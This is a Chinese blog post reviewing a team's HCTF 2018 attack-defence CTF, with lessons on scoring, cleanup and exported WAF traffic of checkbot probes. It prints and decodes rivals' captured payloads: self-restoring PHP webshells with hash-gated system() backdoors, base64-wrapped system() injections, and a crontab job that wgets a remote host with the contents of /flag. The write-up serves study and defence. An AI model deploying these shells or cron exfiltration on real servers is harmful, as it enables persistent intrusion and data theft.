HCTF 2018 AWD小记


反思

跑了这么远去杭州,把小组的脸都给丢尽了…
这里说几个我们吃到亏吧,第一次打awd,举办方的赛制和我们之前练习的情形不太一样。可能考虑到去线下的都是老赛棍,就没有照顾到我们这样的萌新,赛制说明都没有。 直到打到后来才知道,10分钟结算一轮flag,如果被攻击的服务被check宕机了,那么这个flag是无效的。即使你在这10分钟内提交flag,他给你显示flag提交成功,但最后结算的时候是不会算上分的。被check宕机的队伍会扣除60分给没有宕机的队伍每人加10分。我们当时想着提了一堆flag打得贼带感,结果能加上的分少的可怜,第一题除了天枢和蓝莲花的师傅偶尔是正常的一轮能涨上100多分,其他队伍全程宕机,所以防守和进攻同等重要

其次就是check相关的,我们配网络连ssh浪费了很多时间,1l 0O分不清,导致我们一上线,我们机子里就被种了一堆马。然后我们拿不到最初始的源码,回滚到第一次备份都还是很多页面都是坏的, 最后web1被check宕了2天整的。然后修洞,不要想着给全站555就能防住被传马了,这次上传点也是一个check点,在后面会结合check流量进行详细分析。

再说说运维相关的,这次我们队我负责运维的,有个比较恼火的东西就是,我们上传的洞一直没修复,因为我一直就用的555去防的,导致我们运维的时候想改一点东西,就会加上写的权限,结果种上了一堆内存马。事后去问他们,题目通过散列根据ip生成随机文件名随机密码的不死马,有一个守护进程的马,还有不断复制的马。我当时运维的时候,web1还行,web2一上线找路由规则就摸了半天,他那个是.htaccess套.htaccess的,所以我给自己目录传一个运维shell,怎么都访问不到。其次就是菜刀连不上的,我拿着burp,一条条命令手动输:

  1. team用户chmod 777 -R ./upload,给与文件夹的写权限才能删里面的文件
  2. www-data用户:killall -u www-data,清掉不死马进程
  3. www-data:chmod 777 -R ./upload,将马权限修改
  4. 最后再rm -rf才能删掉
    但是这过程因为我们没修洞.. 在用team用户给写权限的时候,一堆马又飞进来了…
    在这上面浪费的时间挺多的,所以得提前准备好py菜刀,提前写好这几步操作。

这次比赛,菜刀是别想了,因为临近考试,webshell的利用脚本还有bug没调试完,所以我们就只能现写各种漏洞类型的利用程序,也就仅仅种个马,读个flag就没了。还有其他的套路都没玩的上。

check流量分析

事后把waf记录的流量导出来整理分析了一番,这次举办方的check可谓是十足的严格,第一天全场web宕机。还有他们还会check是否使用通防。

从流量中可以看到,web1的check流程:
注册->登录->上传图片->包含图片
之所以还在数据中看到一堆乱七八糟的类似payload的东西,这肯定就是主办方check通防的方法了。

所以:

  1. 千万不要用555,宁可上一个.htaccess(虽然后面还是被蓝莲花的师傅rm/覆盖了)
  2. 不要想着banip了,checkbot的ip会变几次,更何况还会被举报,check到一次扣800分…
  3. 切完不要直接删功能点,文件包含这个点,看着就是一个后门'<?php include($_GET['img']); ?>',结果谁知道这是个check点..
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
time: 
ip: 192.168.233.42
POST /client/user/emmm_play.class.php?emmm_cms=reg&flag=ZrMlDhzjtpiKdWQnPNVyBxvw%20'%20or%20select%201,2,3,4,5,(select%200xazuLSJeROvTlnChqgXmBpFckHADoKfGsbdZMPItVwirjENWQUyxY),7,8,9,10,11,12
Host: 192.168.233.40:5005
Content-Length: 274
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
post-data: lang=cn&COL_Useremail=wqtCeoznUp%40pDusboSjcE.com&COL_Useranswer=KvcuIkTRwz&COL_Userproblem=%E4%BD%A0%E8%87%AA%E5%B7%B2%E7%9A%84%E7%94%9F%E6%97%A5%EF%BC%9F&source=0&ip=127.0.0.1&COL_Userpass2=123456&COL_Userpass=123456&introducer=&Submit=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C


time:
ip: 192.168.233.42
POST /client/user/emmm_play.class.php?emmm_cms=login&flag=edruHEyhIcsMPivmpoWxlzNjVYCFgLwSaAGDbnkt%20'%20&&%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,(select%200xeYKCTRrMpmofFqEsdNhnZlcXDiUVSbxgzHyGuQJtIBWjvLPwkaOA)
Host: 192.168.233.40:5005
Content-Length: 87
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Cookie: PHPSESSID=ol9nsqdpgkli34mu4kuebohcqk
Content-Type: application/x-www-form-urlencoded
post-data: COL_Useremail=wqtCeoznUp%40pDusboSjcE.com&COL_Userpass=123456&Submit=%E7%99%BB%E5%BD%95


time:
ip: 192.168.233.42
POST //client/user/emmm_play.class.php?emmm_cms=edit&lang=cn
Host: 192.168.233.40:5005
Content-Length: 79075
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Cookie: PHPSESSID=ol9nsqdpgkli34mu4kuebohcqk
Content-Type: multipart/form-data; boundary=ad7bceb5053a4b3ca22cd26f34b77a19


time:
ip: 192.168.233.42
GET /client/user/index.php?img=../../skin/HcSLetgnrb.png
Host: 192.168.233.40:5005
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0

day2-web1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
2018/12/16 02:32:10
GET /check?cmd=sdhABbfUTgCuIWqSnvXRjYLM.move_file(AOFyfsqBgVeoTdKtMSICEjaGbRUHL.base64_decode(file_get_content(VMZthpbqiuzURmGCDEwFHyadSPrNeWxnQsYkKXcgJAjoTlBIOvfL).zGgOeoBqwVrIjayQLUWbDinvh).SFhuxlvKbWkUwMYE HTTP/1.1
IP:192.168.22.243
HOST:192.168.117.100:9009:9009
USER_AGENT:
COOKIE:
REFERER:




2018/12/16 02:37:02
GET /check?cmd=MxyLYmfRiUWuqIFCVowJrOSATEgtHs ' && select 1,2,3,4 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:
REFERER:


2018/12/16 02:37:02
GET /?cmd=YfLvGKAnQNebwqpPijUu ' or select 1,2,3,4,5,6,7,8,9,10,11,12,(select 0xyUpKDhLVwfBtFivxAbZqEjXCQdJYMaGlozIHPnuekOcNmsgWR),14,15,16,17,18,19,20,21,22,23,24,25 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:
REFERER:


2018/12/16 02:37:02
GET /users/register?cmd=irTekycoKIWSRCsfUqxBAgapl.substr(NhaVIUPfvOmuAjDgrsXJSKMixYyBZo.readdir(VnAGsifbEUZzjCw.move_file(DivqLWumQORGaTkJrC.readdir(base64_decode(fporTBYmQdAHxyuRXcIEnDFhGOkzMbLaWwNVetUvqjZPgClJKSsi).LEwjPvQxCKFOA).TEivOpdPRkrcouhzVKbeIaFUGH).OMVWBXdxNPGgAeLhS).pdrcXqohZFHW) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


POST /users/register?cmd=xRVrcDLSZMUPpbXjsBiOz ' union select 1,2,3,4,5,6,7,(select 0xXctOkvxodFyfGUuTDgblraRziAVSYKsQJHemEjZhwPWnLICNBMqp),9,10,11,12,13,14,15 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:username=ecCNkO&confirm_password=kaljXLRHtU&password=kaljXLRHtU


2018/12/16 02:37:02
GET /users/login HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


2018/12/16 02:37:02
GET /users/login?cmd=bcjusDLfkrpMTwHeloSWZgqAd.file_put_contents(fhHiInvDELpKeJ.readdir(NFvnqgXMJHDE.glob(mtCEkDWycgzqnQVLaJPiZS.assert(ytvJChwoYe.fread(file_put_contents(GwLUrvORJmIPfYjVcMAuCtzBSThHZqXKb).hnrjIwBUuPexykfiWqc).HBSQthcujMYWDFPUkaAVgbivTsnN).KYsLfDbFHW).HGTMvLBkRgDmVKIso).RbIkdCSDoErKHYFqatGNjsWh) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


POST /users/login?cmd=GLpMuASfsPFWiXc.fread(CBMwgWxDbtcFPjAmNnXUVovKpieaLY.fread(mzuYHcTVvraCJhXR.dirname(lwzeLcmxMbTUoXgsABfYiJ.system(zHaZomhUABCrlWPykdqbIiD.eval(system(CxrWZSDBOknpjNweauXYdAgvoPzHQJRsbGcfVtElFMyIKThUqimL).jBqTLeChVQsDxmRtIZWbgki).yMqBZgcwzXjblrAYfEUICQThnD).GkovubFLynSrixIcpJgqR).OSyBnrvoWeXuIPNpEGsARZzJ).hsjweqlXxPrDROkMEibS) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:username=ecCNkO&password=kaljXLRHtU


2018/12/16 02:37:02
GET /users HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


POST /users/editprofit?cmd=YzOLfeHKbVjZyhcwonRXtJvTpSEIu.glob(maOUqAfuQhYM.file_get_content(KrzfMtSDuExbLX.move_file(readdir(gKUYOAHyNewQkRnoJfMXBmzpjTiaGdshcCEtFbrqxVWDIvSuPLlZ).TuPQJlhNjUYARoKIDEtCsaWcLBx).vikIXSEDftUW).fPzAivYRQEcIKCXrnNs) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:username=QwLryC&email=vESrMpul%40OlZDs


2018/12/16 02:37:02
GET /users HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


POST /users/editAvatar?cmd=XJqDYlazVZAxwtmNFnIyiQkGSvPcKOHoRfEWT ' and select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select 0xCUJzbVPHQLMpGZxaBDRSFdfhgcWEkryqiswlvjnTutmIAYKNXeoO),30,31,32,33,34,35 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:


POST /users?cmd=OYhzfowNAdGcvpRWsUbCXqIn.dirname(ZxtIKuPJprHCifgvGLQDmTeWjEnRsd.assert(qAxgrvhSiK.move_file(UTpIhfOkulKaxSoQjzwLmHZeYtr.substr(JimRENYeHZ.dirname(assert(fldrzeIkncKqORGVTiEtuFhoNwpJAPxSyUBDCLmZvXHWQMagsjYb).mzLflHhTvrCGyjPSnNU).PuvwmptyQRWn).UcrCmvYgKjAFiXEVuIeGw).wBJClAQUGr).puUhczOWfMJQSxIyqXLEGAwnNCKDRZ) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:

沟通

虽然不限制外网,但是网线和wifi切换起来还是很麻烦而且时效性也是个问题。我们在队内用飞鸽传书这个内网聊天程序来解决的。也尝试了双网卡,但是还是有一点小问题。

师傅们的shell

  • 默小西师傅的shell:
    moxiaoxi ip:192.168.13.134

他的shell同时还进行了内容检测。其实也可以破,我们清马的时候,记一下文件名,然后清完之后,给他上一个同名文件记录流量,就知道他密码了,然后搭一波顺风车~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
system('/bin/echo mo123;/bin/echo JHBhdGggPSAnL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLjRiMjIzMzFjZTg2YzhjYWEwYWRjMzcwMzkzMjZkNWZjLnBocCc7CiRjb2RlX3RlbXBsYXRlID0gIlBEOXdhSEFLSUNBZ0lDQWdJQ0FnSUNBZ2FXZHViM0psWDNWelpYSmZZV0p2Y25Rb2RISjFaU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lITmxkRjkwYVcxbFgyeHBiV2wwS0RBcE93b2dJQ0FnSUNBZ0lDQWdJQ0FrWm1sc1pTQTlJQ0l1TkdJeU1qTXpNV05sT0Raak9HTmhZVEJoWkdNek56QXpPVE15Tm1RMVptTXVjR2h3SWpzS0lDQWdJQ0FnSUNBZ0lDQWdKSE5vWld4c0lEMGdZbUZ6WlRZMFgyUmxZMjlrWlNnblVFUTVkMkZJUVV0aFYxbHZVVU5TWmxWclZsSldWVlpVVmtaemFXRkhSbnBoUTBwa1VGUXdPVWx0V214WlYxRjNXbTFhYUUxRVFtcE5WR3hwVG0xSk1scFVTVEZhVkZsM1dtMUplbGx0VG14WmFsSnBTV2xyUzJWM2IyZEpRMEZuVVVoT05XTXpVbXhpVTJkcldERktSbFZXVmtaVk1WSmlTVzB4ZG1WSGJHaGlNMmh3VG1wWk1rbHNNSEJQZDNBNVEybzRLeWNwT3dvZ0lDQWdJQ0FnSUNBZ0lDQjFibXhwYm1zb1gxOUdTVXhGWDE4cE93b2dJQ0FnSUNBZ0lDQWdJQ0IzYUdsc1pTQW9WRkpWUlNrZ2Uzc0tJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUm1hV3hsS1NFOVBTUnphR1ZzYkNrZ2Uzc2dabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9KR1pwYkdVc0lDUnphR1ZzYkNrN0lIMTlDaUFnSUNBZ0lDQWdJQ0FnSUhWemJHVmxjQ2cxS1RzS0lDQWdJQ0FnSUNBZ0lDQWdmWDBLSUNBZ0lDQWdJQ0FnSUNBZ1B6ND0iOwpmaWxlX3B1dF9jb250ZW50cygkcGF0aCwgYmFzZTY0X2RlY29kZSgkY29kZV90ZW1wbGF0ZSksIExPQ0tfRVgpOw== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');


base64:
$path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
$code_template = "PD9waHAKICAgICAgICAgICAgaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CiAgICAgICAgICAgIHNldF90aW1lX2xpbWl0KDApOwogICAgICAgICAgICAkZmlsZSA9ICIuNGIyMjMzMWNlODZjOGNhYTBhZGMzNzAzOTMyNmQ1ZmMucGhwIjsKICAgICAgICAgICAgJHNoZWxsID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUthV1lvUUNSZlVrVlJWVVZUVkZzaWFHRnphQ0pkUFQwOUltWmxZV1F3Wm1aaE1EQmpNVGxpTm1JMlpUSTFaVFl3Wm1JelltTmxZalJpSWlrS2V3b2dJQ0FnUUhONWMzUmxiU2drWDFKRlVWVkZVMVJiSW0xdmVHbGhiM2hwTmpZMklsMHBPd3A5Q2o4KycpOwogICAgICAgICAgICB1bmxpbmsoX19GSUxFX18pOwogICAgICAgICAgICB3aGlsZSAoVFJVRSkge3sKICAgICAgICAgICAgaWYgKGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSE9PSRzaGVsbCkge3sgZmlsZV9wdXRfY29udGVudHMoJGZpbGUsICRzaGVsbCk7IH19CiAgICAgICAgICAgIHVzbGVlcCg1KTsKICAgICAgICAgICAgfX0KICAgICAgICAgICAgPz4=";
file_put_contents($path, base64_decode($code_template), LOCK_EX);


$code_template的base64解码
<?php
ignore_user_abort(true);
set_time_limit(0);
$file = ".4b22331ce86c8caa0adc37039326d5fc.php";
$shell = base64_decode('PD9waHAKaWYoQCRfUkVRVUVTVFsiaGFzaCJdPT09ImZlYWQwZmZhMDBjMTliNmI2ZTI1ZTYwZmIzYmNlYjRiIikKewogICAgQHN5c3RlbSgkX1JFUVVFU1RbIm1veGlhb3hpNjY2Il0pOwp9Cj8+');
unlink(__FILE__);
while (TRUE) {{
if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
usleep(5);
}}
?>


$shell 解base64:
<?php
if(@$_REQUEST["hash"]==="fead0ffa00c19b6b6e25e60fb3bceb4b")
{
@system($_REQUEST["moxiaoxi666"]);
}
?>
  • 2:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    system%28%27%2Fbin%2Fecho+mo123%3B%2Fbin%2Fecho+JHBhdGggPSAnL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLjRiMjIzMzFjZTg2YzhjYWEwYWRjMzcwMzkzMjZkNWZjLnBocCc7CiRjb2RlX3RlbXBsYXRlID0gIlBEOXdhSEFLSUNBZ0lDQWdJQ0FnSUNBZ2FXZHViM0psWDNWelpYSmZZV0p2Y25Rb2RISjFaU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lITmxkRjkwYVcxbFgyeHBiV2wwS0RBcE93b2dJQ0FnSUNBZ0lDQWdJQ0FrWm1sc1pTQTlJQ0l1TkdJeU1qTXpNV05sT0Raak9HTmhZVEJoWkdNek56QXpPVE15Tm1RMVptTXVjR2h3SWpzS0lDQWdJQ0FnSUNBZ0lDQWdKSE5vWld4c0lEMGdZbUZ6WlRZMFgyUmxZMjlrWlNnblVFUTVkMkZJUVV0aFYxbHZVVU5TWmxWclZsSldWVlpVVmtaemFXRkhSbnBoUTBwa1VGUXdPVWx0V214WlYxRjNXbTFhYUUxRVFtcE5WR3hwVG0xSk1scFVTVEZhVkZsM1dtMUplbGx0VG14WmFsSnBTV2xyUzJWM2IyZEpRMEZuVVVoT05XTXpVbXhpVTJkcldERktSbFZXVmtaVk1WSmlTVzB4ZG1WSGJHaGlNMmh3VG1wWk1rbHNNSEJQZDNBNVEybzRLeWNwT3dvZ0lDQWdJQ0FnSUNBZ0lDQjFibXhwYm1zb1gxOUdTVXhGWDE4cE93b2dJQ0FnSUNBZ0lDQWdJQ0IzYUdsc1pTQW9WRkpWUlNrZ2Uzc0tJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUm1hV3hsS1NFOVBTUnphR1ZzYkNrZ2Uzc2dabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9KR1pwYkdVc0lDUnphR1ZzYkNrN0lIMTlDaUFnSUNBZ0lDQWdJQ0FnSUhWemJHVmxjQ2cxS1RzS0lDQWdJQ0FnSUNBZ0lDQWdmWDBLSUNBZ0lDQWdJQ0FnSUNBZ1B6ND0iOwpmaWxlX3B1dF9jb250ZW50cygkcGF0aCwgYmFzZTY0X2RlY29kZSgkY29kZV90ZW1wbGF0ZSksIExPQ0tfRVgpOw%3D%3D+%7C+%2Fusr%2Fbin%2Fbase64+-d+%7C+%2Fbin%2Fcat+%3E+%2Fhome%2Fteam%2Fworkdir%2F%2F.4b22331ce86c8caa0adc37039326d5fc.php%3B%2Fbin%2Fecho+xiaoxi456890%27%29%3B

    // url decode
    system('/bin/echo mo123;/bin/echo JHBhdGggPSAnL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLjRiMjIzMzFjZTg2YzhjYWEwYWRjMzcwMzkzMjZkNWZjLnBocCc7CiRjb2RlX3RlbXBsYXRlID0gIlBEOXdhSEFLSUNBZ0lDQWdJQ0FnSUNBZ2FXZHViM0psWDNWelpYSmZZV0p2Y25Rb2RISjFaU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lITmxkRjkwYVcxbFgyeHBiV2wwS0RBcE93b2dJQ0FnSUNBZ0lDQWdJQ0FrWm1sc1pTQTlJQ0l1TkdJeU1qTXpNV05sT0Raak9HTmhZVEJoWkdNek56QXpPVE15Tm1RMVptTXVjR2h3SWpzS0lDQWdJQ0FnSUNBZ0lDQWdKSE5vWld4c0lEMGdZbUZ6WlRZMFgyUmxZMjlrWlNnblVFUTVkMkZJUVV0aFYxbHZVVU5TWmxWclZsSldWVlpVVmtaemFXRkhSbnBoUTBwa1VGUXdPVWx0V214WlYxRjNXbTFhYUUxRVFtcE5WR3hwVG0xSk1scFVTVEZhVkZsM1dtMUplbGx0VG14WmFsSnBTV2xyUzJWM2IyZEpRMEZuVVVoT05XTXpVbXhpVTJkcldERktSbFZXVmtaVk1WSmlTVzB4ZG1WSGJHaGlNMmh3VG1wWk1rbHNNSEJQZDNBNVEybzRLeWNwT3dvZ0lDQWdJQ0FnSUNBZ0lDQjFibXhwYm1zb1gxOUdTVXhGWDE4cE93b2dJQ0FnSUNBZ0lDQWdJQ0IzYUdsc1pTQW9WRkpWUlNrZ2Uzc0tJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUm1hV3hsS1NFOVBTUnphR1ZzYkNrZ2Uzc2dabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9KR1pwYkdVc0lDUnphR1ZzYkNrN0lIMTlDaUFnSUNBZ0lDQWdJQ0FnSUhWemJHVmxjQ2cxS1RzS0lDQWdJQ0FnSUNBZ0lDQWdmWDBLSUNBZ0lDQWdJQ0FnSUNBZ1B6ND0iOwpmaWxlX3B1dF9jb250ZW50cygkcGF0aCwgYmFzZTY0X2RlY29kZSgkY29kZV90ZW1wbGF0ZSksIExPQ0tfRVgpOw== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');

    // base64 decode
    system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
    $code_template = "PD9waHAKICAgICAgICAgICAgaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CiAgICAgICAgICAgIHNldF90aW1lX2xpbWl0KDApOwogICAgICAgICAgICAkZmlsZSA9ICIuNGIyMjMzMWNlODZjOGNhYTBhZGMzNzAzOTMyNmQ1ZmMucGhwIjsKICAgICAgICAgICAgJHNoZWxsID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUthV1lvUUNSZlVrVlJWVVZUVkZzaWFHRnphQ0pkUFQwOUltWmxZV1F3Wm1aaE1EQmpNVGxpTm1JMlpUSTFaVFl3Wm1JelltTmxZalJpSWlrS2V3b2dJQ0FnUUhONWMzUmxiU2drWDFKRlVWVkZVMVJiSW0xdmVHbGhiM2hwTmpZMklsMHBPd3A5Q2o4KycpOwogICAgICAgICAgICB1bmxpbmsoX19GSUxFX18pOwogICAgICAgICAgICB3aGlsZSAoVFJVRSkge3sKICAgICAgICAgICAgaWYgKGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSE9PSRzaGVsbCkge3sgZmlsZV9wdXRfY29udGVudHMoJGZpbGUsICRzaGVsbCk7IH19CiAgICAgICAgICAgIHVzbGVlcCg1KTsKICAgICAgICAgICAgfX0KICAgICAgICAgICAgPz4=";
    file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');

    // base64 decode
    system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
    $code_template = "<?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = ".4b22331ce86c8caa0adc37039326d5fc.php";
    $shell = base64_decode('PD9waHAKaWYoQCRfUkVRVUVTVFsiaGFzaCJdPT09ImZlYWQwZmZhMDBjMTliNmI2ZTI1ZTYwZmIzYmNlYjRiIikKewogICAgQHN5c3RlbSgkX1JFUVVFU1RbIm1veGlhb3hpNjY2Il0pOwp9Cj8+');
    unlink(__FILE__);
    while (TRUE) {{
    if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
    usleep(5);
    }}
    ?>";
    file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');


    // decode
    system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
    $code_template = "<?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = ".4b22331ce86c8caa0adc37039326d5fc.php";
    $shell = base64_decode('<?php
    if(@$_REQUEST["hash"]==="fead0ffa00c19b6b6e25e60fb3bceb4b")
    {
    @system($_REQUEST["moxiaoxi666"]);
    }Cj8+');
    unlink(__FILE__);
    while (TRUE) {{
    if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
    usleep(5);
    }}
    ?>";
    file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');
  • 3: 种crontab后门定时交flag

    1
    2
    3
    4
    5
    system('/bin/echo mo123;/bin/echo KiAqICogKiAqIC91c3IvYmluL3dnZXQgImh0dHA6Ly8xOTIuMTY4LjIwMC4xNTA6ODAwNS9hcGkvdGVhbS9zdWJtaXQvL2MxMzYyODI2MjI5M2M1ODVlYmZhZDM3Y2ExYzVlNzdkNDI4ZjVkY2QiIC1kICImZmxhZz0kKC9iaW4vY2F0IC9mbGFnKSIgLUggIkNvb2tpZTpkZGFhcyIK | /usr/bin/base64 -d | /bin/cat >> /tmp//tmp.conf ; /usr/bin/crontab /tmp//tmp.conf;/bin/echo xiaoxi456890');


    decode base64
    * * * * * /usr/bin/wget "https://192.168.200.150:8005/api/team/submit//c13628262293c585ebfad37ca1c5e77d428f5dcd" -d "&flag=$(/bin/cat /flag)" -H "Cookie:ddaas"
  • 4

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    system%28%27%2Fbin%2Fecho+HENCE666%3B%2Fbin%2Fecho+PD9waHAKCQlpZ25vcmVfdXNlcl9hYm9ydCh0cnVlKTsKCQlzZXRfdGltZV9saW1pdCgwKTsKCQkkZmlsZSA9ICItLThmMDI5MzhlOWQyMWU2N2JmYzg3MjQwZjU4NGQ2NDQzLnBocCI7CgkJJHNoZWxsID0gJzw%2FcGhwIGlmKCRfUkVRVUVTVFtoYXNoXT09ImY5YjY5YTA5NjUxNGYyODIxMjg5MzVmZDA3N2YyZWJiIil7JGNfMSA9IGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUkVRVUVTVFthXSkpOyRjXzIgPSBiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1JFUVVFU1RbYl0pKTskY18xKCRjXzIpO30%2FPic7CgkJdW5saW5rKF9fRklMRV9fKTsKCQl3aGlsZSAoVFJVRSkge3sKCQlpZiAoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpIT09JHNoZWxsKSB7eyBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwgJHNoZWxsKTsgfX0KCQl1c2xlZXAoNSk7CgkJfX0KCQk%2FPg%3D%3D+%7C+%2Fusr%2Fbin%2Fbase64+-d+%7C+%2Fbin%2Fcat+%3E+%2Fvar%2Fwww%2Fhtml%2F%2F--8f02938e9d21e67bfc87240f584d6443.php%3B%2Fbin%2Fecho+ZHANG777%27%29%3B

    // decode
    system('/bin/echo HENCE666;/bin/echo PD9waHAKCQlpZ25vcmVfdXNlcl9hYm9ydCh0cnVlKTsKCQlzZXRfdGltZV9saW1pdCgwKTsKCQkkZmlsZSA9ICItLThmMDI5MzhlOWQyMWU2N2JmYzg3MjQwZjU4NGQ2NDQzLnBocCI7CgkJJHNoZWxsID0gJzw/cGhwIGlmKCRfUkVRVUVTVFtoYXNoXT09ImY5YjY5YTA5NjUxNGYyODIxMjg5MzVmZDA3N2YyZWJiIil7JGNfMSA9IGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUkVRVUVTVFthXSkpOyRjXzIgPSBiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1JFUVVFU1RbYl0pKTskY18xKCRjXzIpO30/Pic7CgkJdW5saW5rKF9fRklMRV9fKTsKCQl3aGlsZSAoVFJVRSkge3sKCQlpZiAoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpIT09JHNoZWxsKSB7eyBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwgJHNoZWxsKTsgfX0KCQl1c2xlZXAoNSk7CgkJfX0KCQk/Pg== | /usr/bin/base64 -d | /bin/cat > /var/www/html//--8f02938e9d21e67bfc87240f584d6443.php;/bin/echo ZHANG777');

    // decode base64
    system('/bin/echo HENCE666;/bin/echo <?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = "--8f02938e9d21e67bfc87240f584d6443.php";
